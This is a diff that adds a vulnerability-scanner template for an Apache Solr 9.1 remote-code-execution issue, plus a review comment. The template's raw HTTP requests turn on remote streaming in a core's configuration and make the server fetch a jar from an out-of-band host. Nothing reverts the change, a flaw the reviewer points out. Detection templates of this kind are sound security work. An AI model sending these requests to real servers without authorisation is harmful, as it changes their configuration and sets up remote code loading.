diff --git a/vulnerabilities/apache-solr-9.1-rce.yaml b/vulnerabilities/apache-solr-9.1-rce.yaml
new file mode 100644
index 0000000000..50f220fcad
--- /dev/null
+++ b/vulnerabilities/apache-solr-9.1-rce.yaml
@@ -0,0 +1,45 @@
+id: apache-solr-9.1-rce
+
+info:
+ name: Apache Solr 9.1 RCE
+ author: j4vaovo
+ severity: critical
+ description: |
+ Apache Solr 9.1 RCE
+ reference:
+ - https://noahblog.360.cn/apache-solr-rce/
+ tags: solr,apache,rce,oast
+
+requests:
+ - raw:
+ - |
+ POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+
+ - |
+ POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
+ Connection: close
+
+ --------------------------5897997e44b07bf9
+ Content-Disposition: form-data; name="stream.url"
+
+ jar:http://{{interactsh-url}}/test.jar?!/Test.class
+ --------------------------5897997e44b07bf9--
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: interactsh_request
+ words:
+ - "User-Agent: Java"
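Review bot: The first raw request (`set-property` on `requestDispatcher.requestParsers.enableRemoteStreaming`) persistently changes the scanned instance's configuration and nothing in the template reverts it, yet the `description` block only repeats the template name and says nothing about that side effect. The description should state that the check toggles remote streaming on the target core, that the hard-coded `gettingstarted_shard1_replica_n1` / `gettingstarted_shard2_replica_n1` core names (note the shard1/shard2 mismatch between the two requests) tie the template to the default example collection and will likely miss other deployments, and that the two interactsh matchers (`interactsh_protocol` = `http`, `User-Agent: Java`) confirm only that the server fetched the supplied URL, not that code ran, so `severity: critical` is asserted rather than verified. The `info` block also carries no CVE or vendor advisory identifier beyond the blog link; add one if the issue has been assigned one, or say explicitly in the description that it has not.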